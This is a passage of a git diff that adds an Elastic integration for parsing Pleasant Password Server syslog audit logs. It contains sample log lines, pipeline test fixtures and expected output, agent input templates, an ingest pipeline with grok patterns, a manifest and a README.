Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr 127.0.0.1 23/01 09:49:10.894 +<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test 127.0.0.1 23/01 11:32:57.857 +<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on 127.0.0.1 23/01 12:37:37.346 +<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password 127.0.0.1 23/01 12:38:07.629 +<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified - User verified via ApplicationBasicOAuth 127.0.0.1 23/01 13:43:47.422 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves 127.0.0.1 23/01 13:47:25.593 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied 127.0.0.1 23/01 13:47:25.641 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate 127.0.0.1 23/01 14:05:54.404 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry 127.0.0.1 23/01 14:05:54.450 diff --git a/packages/pps/changelog.yml b/packages/pps/changelog.yml new file mode 100644 index 00000000000..375181b767a --- /dev/null +++ b/packages/pps/changelog.yml @@ -0,0 +1,6 @@ +# newer versions go on top +- version: "0.0.1" + changes: + - description: Initial Integration for Pleasant Password Server in Elastic + type: enhancement + link: https://github.com/elastic/integrations/pull/8951 diff --git a/packages/pps/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/pps/data_stream/log/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log b/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log new file mode 100644 index 00000000000..a0bb3c706ef --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log @@ -0,0 +1,10 @@ +<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr 127.0.0.1 23/01 09:49:10.894 +<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test 127.0.0.1 23/01 11:32:57.857 +<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on 127.0.0.1 23/01 12:37:37.346 +<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password 127.0.0.1 23/01 12:38:07.629 +<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified - User verified via ApplicationBasicOAuth 127.0.0.1 23/01 13:43:47.422 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves 127.0.0.1 23/01 13:47:25.593 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied 127.0.0.1 23/01 13:47:25.641 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate 127.0.0.1 23/01 14:05:54.404 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry 127.0.0.1 23/01 14:05:54.450 \ No newline at end of file diff --git a/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log-expected.json b/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log-expected.json new file mode 100644 index 00000000000..dc77b3e82d4 --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/pipeline/test-log.log-expected.json @@ -0,0 +1,309 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-23T09:49:10.000Z", + "client": { + "ip": "192.168.1.2" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T09:49:10.000Z", + "original": "<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T11:32:57.000Z", + "client": { + "ip": "192.168.1.2" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T11:32:57.000Z", + "original": "<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test\t127.0.0.1\t23/01 11:32:57.857\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Password Fetched - User fetched the password for - test\t127.0.0.1\t23/01 11:32:57.857\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T12:20:07.000Z", + "client": { + "ip": "0.0.0.0" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T12:20:07.000Z", + "original": "<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on\t127.0.0.1\t23/01 12:37:37.346", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Session Log On - User logged on\t127.0.0.1\t23/01 12:37:37.346", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T12:38:07.000Z", + "client": { + "ip": "192.168.1.1" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T12:38:07.000Z", + "original": "<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password\t127.0.0.1\t23/01 12:38:07.629\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Entry Updated - User updated entry changing the password\t127.0.0.1\t23/01 12:38:07.629\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T13:43:47.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T13:43:47.000Z", + "original": "<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified - User verified via ApplicationBasicOAuth\t127.0.0.1\t23/01 13:43:47.422\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Identity Verified - User verified via ApplicationBasicOAuth\t127.0.0.1\t23/01 13:43:47.422\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T13:47:25.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T13:47:25.000Z", + "original": "<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves\t127.0.0.1\t23/01 13:47:25.593\t", + "outcome": "failure" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Identity Not Verified - User failed to verify themselves\t127.0.0.1\t23/01 13:47:25.593\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T13:47:25.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T13:47:25.000Z", + "original": "<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied\t127.0.0.1\t23/01 13:47:25.641\t", + "outcome": "failure" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Sign-in Failed - User sign-in denied\t127.0.0.1\t23/01 13:47:25.641\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T14:05:54.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T14:05:54.000Z", + "original": "<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate\t127.0.0.1\t23/01 14:05:54.404\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Entry Created - User created entry as a duplicate\t127.0.0.1\t23/01 14:05:54.404\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + }, + { + "@timestamp": "2024-01-23T14:05:54.000Z", + "client": { + "ip": "192.168.1.3" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2024-01-23T14:05:54.000Z", + "original": "<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry \t127.0.0.1\t23/01 14:05:54.450\t", + "outcome": "success" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "log": { + "syslog": { + "priority": 134 + } + }, + "message": "Entry Duplicated - User duplicated entry \t127.0.0.1\t23/01 14:05:54.450\t", + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } + } + ] +} \ No newline at end of file diff --git a/packages/pps/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/pps/data_stream/log/_dev/test/system/test-logfile-config.yml new file mode 100644 index 00000000000..3f93edd54e6 --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -0,0 +1,10 @@ +service: pps-log-logfile +input: logfile +vars: + paths: + - "{{SERVICE_LOGS_DIR}}/*.log" +data_stream: + vars: + preserve_original_event: true +assert: + hit_count: 10 diff --git a/packages/pps/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/pps/data_stream/log/_dev/test/system/test-tcp-config.yml new file mode 100644 index 00000000000..6967de26d33 --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -0,0 +1,11 @@ +service: pps-log-tcp +service_notify_signal: SIGHUP +input: tcp +vars: + listen_address: 0.0.0.0 +data_stream: + vars: + listen_port: 9037 + preserve_original_event: true +assert: + hit_count: 10 diff --git a/packages/pps/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/pps/data_stream/log/_dev/test/system/test-udp-config.yml new file mode 100644 index 00000000000..f392d0d168c --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/system/test-udp-config.yml @@ -0,0 +1,11 @@ +service: pps-log-udp +service_notify_signal: SIGHUP +input: udp +vars: + listen_address: 0.0.0.0 +data_stream: + vars: + listen_port: 9038 + preserve_original_event: true +assert: + hit_count: 10 diff --git a/packages/pps/data_stream/log/_dev/test/system/test-udp-tz-config.yml b/packages/pps/data_stream/log/_dev/test/system/test-udp-tz-config.yml new file mode 100644 index 00000000000..e9de3d73845 --- /dev/null +++ b/packages/pps/data_stream/log/_dev/test/system/test-udp-tz-config.yml @@ -0,0 +1,12 @@ +service: pps-log-udp +service_notify_signal: SIGHUP +input: udp +vars: + listen_address: 0.0.0.0 +data_stream: + vars: + listen_port: 9038 + preserve_original_event: true + tz_offset: "+0500" +assert: + hit_count: 10 diff --git a/packages/pps/data_stream/log/agent/stream/log.yml.hbs b/packages/pps/data_stream/log/agent/stream/log.yml.hbs new file mode 100644 index 00000000000..ef78b8fab52 --- /dev/null +++ b/packages/pps/data_stream/log/agent/stream/log.yml.hbs @@ -0,0 +1,26 @@ +paths: +{{#each paths as |path|}} + - {{path}} +{{/each}} +exclude_files: ['\.gz$'] +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: "{{tz_offset}}" +{{/if}} +processors: +- add_locale: ~ +{{#if processors}} +{{processors}} +{{/if}} diff --git a/packages/pps/data_stream/log/agent/stream/tcp.yml.hbs b/packages/pps/data_stream/log/agent/stream/tcp.yml.hbs new file mode 100644 index 00000000000..e0d65510297 --- /dev/null +++ b/packages/pps/data_stream/log/agent/stream/tcp.yml.hbs @@ -0,0 +1,24 @@ +host: "{{listen_address}}:{{listen_port}}" +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: "{{tz_offset}}" +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/pps/data_stream/log/agent/stream/udp.yml.hbs b/packages/pps/data_stream/log/agent/stream/udp.yml.hbs new file mode 100644 index 00000000000..4fdea17c509 --- /dev/null +++ b/packages/pps/data_stream/log/agent/stream/udp.yml.hbs @@ -0,0 +1,24 @@ +host: "{{listen_address}}:{{listen_port}}" +{{#if udp_options}} +{{udp_options}} +{{/if}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: "{{tz_offset}}" +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/pps/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/pps/data_stream/log/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..8a6e9d63c9a --- /dev/null +++ b/packages/pps/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,92 @@ +--- +description: Pipeline for processing Pleasant Password Server logs. +processors: + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - set: + field: ecs.version + value: "8.11.0" + - grok: + field: event.original + patterns: + - '^<%{NUMBER:log.syslog.priority:long}>%{SYSLOGTIMESTAMP:event.created}\s+%{NOTSPACE:host.hostname}\s%{DATA}:%{IP:client.ip}\s-\s%{USERNAME:user.name}@%{DATA:user.domain}\s%{DATA}(?(Success)|(Error))\s-\s%{GREEDYDATA:message}' + - '^<%{NUMBER:log.syslog.priority:long}>%{SYSLOGTIMESTAMP:event.created}\s+%{NOTSPACE:host.domain}\s%{DATA}:%{IP:client.ip}%{DATA}(?(Success)|(Error))\s-\s%{GREEDYDATA:message}' + - '^%{GREEDYDATA:message}$' + # Set the Event Outcome to Lower Case to be ECS Compliant + - lowercase: + field: event.outcome + if: ctx.event?.outcome != null + # Set the Event Outcome to failure if the event.outcome is error + - set: + field: event.outcome + value: "failure" + if: ctx.event?.outcome == 'error' + # Set the Event Outcome to unknown if neither error nor success is present + - set: + field: event.outcome + value: "unknown" + if: ctx.event?.outcome != 'success' && ctx.event?.outcome != 'failure' + - rename: + field: _conf.tz_offset + target_field: event.timezone + if: ctx._conf?.tz_offset != null && ctx._conf.tz_offset != 'local' + ignore_missing: true + ignore_failure: true + - date: + field: event.created + target_field: "event.created" + formats: + - "MMM dd HH:mm:ss" + timezone: "{{{event.timezone}}}" + if: ctx.event?.timezone != null && ctx.event?.created != null + on_failure: + - remove: + field: event.created + ignore_missing: true + - append: + field: error.message + value: "{{{_ingest.on_failure_message}}}" + - date: + field: event.created + target_field: "event.created" + formats: + - "MMM dd HH:mm:ss" + if: ctx.event?.timezone == null && ctx.event?.created != null + on_failure: + - remove: + field: event.created + ignore_missing: true + - append: + field: error.message + value: "{{{_ingest.on_failure_message}}}" + # Since logstash sets the @timestamp if not present, `override: true` is required to overwrite the value with event timestamp. + - set: + field: "@timestamp" + value: "{{{event.created}}}" + if: "ctx.event?.created != null" + override: true + - set: + field: "user.email" + value: "{{{user.name}}}@{{{user.domain}}}" + if: ctx.user?.name != null && ctx.user?.domain != null + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + ignore_missing: true + - remove: + field: + - _conf + - _tmp + ignore_failure: true + ignore_missing: true +on_failure: + - append: + field: error.message + value: "Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}" + - set: + field: event.kind + value: pipeline_error diff --git a/packages/pps/data_stream/log/fields/agent.yml b/packages/pps/data_stream/log/fields/agent.yml new file mode 100644 index 00000000000..a07e2ce0b2b --- /dev/null +++ b/packages/pps/data_stream/log/fields/agent.yml @@ -0,0 +1,6 @@ +- name: input.type + type: keyword + description: Input type +- name: log.offset + type: long + description: Log offset diff --git a/packages/pps/data_stream/log/fields/base-fields.yml b/packages/pps/data_stream/log/fields/base-fields.yml new file mode 100644 index 00000000000..9b0bfa08529 --- /dev/null +++ b/packages/pps/data_stream/log/fields/base-fields.yml @@ -0,0 +1,15 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: log.source.address + type: keyword + description: Log source address diff --git a/packages/pps/data_stream/log/fields/ecs.yml b/packages/pps/data_stream/log/fields/ecs.yml new file mode 100644 index 00000000000..e8b886726b1 --- /dev/null +++ b/packages/pps/data_stream/log/fields/ecs.yml @@ -0,0 +1,20 @@ +- external: ecs + name: user.name +- external: ecs + name: user.domain +- external: ecs + name: user.email +- external: ecs + name: client.ip +- external: ecs + name: ecs.version +- external: ecs + name: log.syslog.priority +- external: ecs + name: message +- external: ecs + name: event.outcome +- external: ecs + name: log.file.path +- external: ecs + name: tags diff --git a/packages/pps/data_stream/log/manifest.yml b/packages/pps/data_stream/log/manifest.yml new file mode 100644 index 00000000000..eaf0a695381 --- /dev/null +++ b/packages/pps/data_stream/log/manifest.yml @@ -0,0 +1,131 @@ +title: Pleasant Password Server logs +type: logs +streams: + - input: logfile + title: Pleasant Password Server logs + description: Collect Pleasant Password Server logs via file input. + template_path: log.yml.hbs + vars: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - pps-log + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: tz_offset + type: text + title: Timezone Offset + multi: false + required: true + show_user: true + default: local + description: >- + By default, datetimes in the logs will be interpreted as relative to the timezone configured in the host where the agent is running. If ingesting logs from a host on a different timezone, use this field to set the timezone offset so that datetimes are correctly parsed. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00") from UCT. + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - input: tcp + title: Pleasant Password Server logs + description: Collect Pleasant Password Server logs via TCP input. + template_path: tcp.yml.hbs + vars: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - pps-log + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: tz_offset + type: text + title: Timezone Offset + multi: false + required: true + show_user: true + default: local + description: >- + By default, datetimes in the logs will be interpreted as relative to the timezone configured in the host where the agent is running. If ingesting logs from a host on a different timezone, use this field to set the timezone offset so that datetimes are correctly parsed. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00") from UCT. + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - input: udp + title: Pleasant Password Server logs + description: Collect Pleasant Password Server logs via UDP input. + template_path: udp.yml.hbs + vars: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - pps-log + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: tz_offset + type: text + title: Timezone Offset + multi: false + required: true + show_user: true + default: local + description: >- + By default, datetimes in the logs will be interpreted as relative to the timezone configured in the host where the agent is running. If ingesting logs from a host on a different timezone, use this field to set the timezone offset so that datetimes are correctly parsed. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00") from UCT. + - name: udp_options + type: yaml + title: Custom UDP Options + multi: false + required: false + show_user: false + default: | + #read_buffer: 100MiB + #max_message_size: 50KiB + #timeout: 300s + description: Specify custom configuration options for the UDP input. + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/pps/data_stream/log/sample_event.json b/packages/pps/data_stream/log/sample_event.json new file mode 100644 index 00000000000..e333d5f8946 --- /dev/null +++ b/packages/pps/data_stream/log/sample_event.json @@ -0,0 +1,60 @@ +{ + "@timestamp": "2024-01-23T09:49:10.000+05:00", + "agent": { + "ephemeral_id": "4839a553-f2b3-4b50-8473-50087ad56a7c", + "id": "fb476fe0-ec94-4731-9642-3d09807f2a87", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.0.0" + }, + "client": { + "ip": "192.168.1.2" + }, + "data_stream": { + "dataset": "pps.log", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "fb476fe0-ec94-4731-9642-3d09807f2a87", + "snapshot": false, + "version": "8.0.0" + }, + "event": { + "agent_id_status": "verified", + "created": "2024-01-23T09:49:10.000+05:00", + "dataset": "pps.log", + "ingested": "2024-01-23T22:18:43Z", + "original": "<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "outcome": "success", + "timezone": "+0500" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "172.24.0.7:44613" + }, + "syslog": { + "priority": 134 + } + }, + "message": "Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "tags": [ + "preserve_original_event", + "forwarded", + "pps-log" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } +} \ No newline at end of file diff --git a/packages/pps/docs/README.md b/packages/pps/docs/README.md new file mode 100644 index 00000000000..0276d532ab7 --- /dev/null +++ b/packages/pps/docs/README.md @@ -0,0 +1,129 @@ +# Pleasant Password Server + +The Pleasant Password Server integration collects and parses DNS, DHCP, and Audit data collected from [Pleasant Password Server](https://pleasantpasswords.com/) via TCP/UDP or logfile. + +## Setup steps +1. Enable the integration with TCP/UDP input. +2. Log in to the PPS WebUI. +3. Configure the PPS to send messages to a Syslog server using the following steps. + 1. From the Menu go to Logging -> Syslog Configuration + 2. Set the Syslog Configuration to Enabled + 3. Set Hostname to the Hostname of your Fleet Agent or Load Balancer + 4. Set the Correct Port used in the Integration Configuration + 5. Set UDP or TCP + 6. Optionally set the Facility + +## Compatibility + +This module has been tested against `Pleasant Password Server Version 7.11.44.0 `. +It should however work with all versions. + +## Log samples +Below are the samples logs of the respective category: + +## Audit Logs: +``` +<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr 127.0.0.1 23/01 09:49:10.894 +<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test 127.0.0.1 23/01 11:32:57.857 +<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on 127.0.0.1 23/01 12:37:37.346 +<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password 127.0.0.1 23/01 12:38:07.629 +<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified - User verified via ApplicationBasicOAuth 127.0.0.1 23/01 13:43:47.422 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves 127.0.0.1 23/01 13:47:25.593 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied 127.0.0.1 23/01 13:47:25.641 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate 127.0.0.1 23/01 14:05:54.404 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry 127.0.0.1 23/01 14:05:54.450 +``` + +## Logs + +This is the `log` dataset. + +An example event for `log` looks as following: + +```json +{ + "@timestamp": "2024-01-23T09:49:10.000+05:00", + "agent": { + "ephemeral_id": "4839a553-f2b3-4b50-8473-50087ad56a7c", + "id": "fb476fe0-ec94-4731-9642-3d09807f2a87", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.0.0" + }, + "client": { + "ip": "192.168.1.2" + }, + "data_stream": { + "dataset": "pps.log", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "fb476fe0-ec94-4731-9642-3d09807f2a87", + "snapshot": false, + "version": "8.0.0" + }, + "event": { + "agent_id_status": "verified", + "created": "2024-01-23T09:49:10.000+05:00", + "dataset": "pps.log", + "ingested": "2024-01-23T22:18:43Z", + "original": "<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "outcome": "success", + "timezone": "+0500" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "172.24.0.7:44613" + }, + "syslog": { + "priority": 134 + } + }, + "message": "Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "tags": [ + "preserve_original_event", + 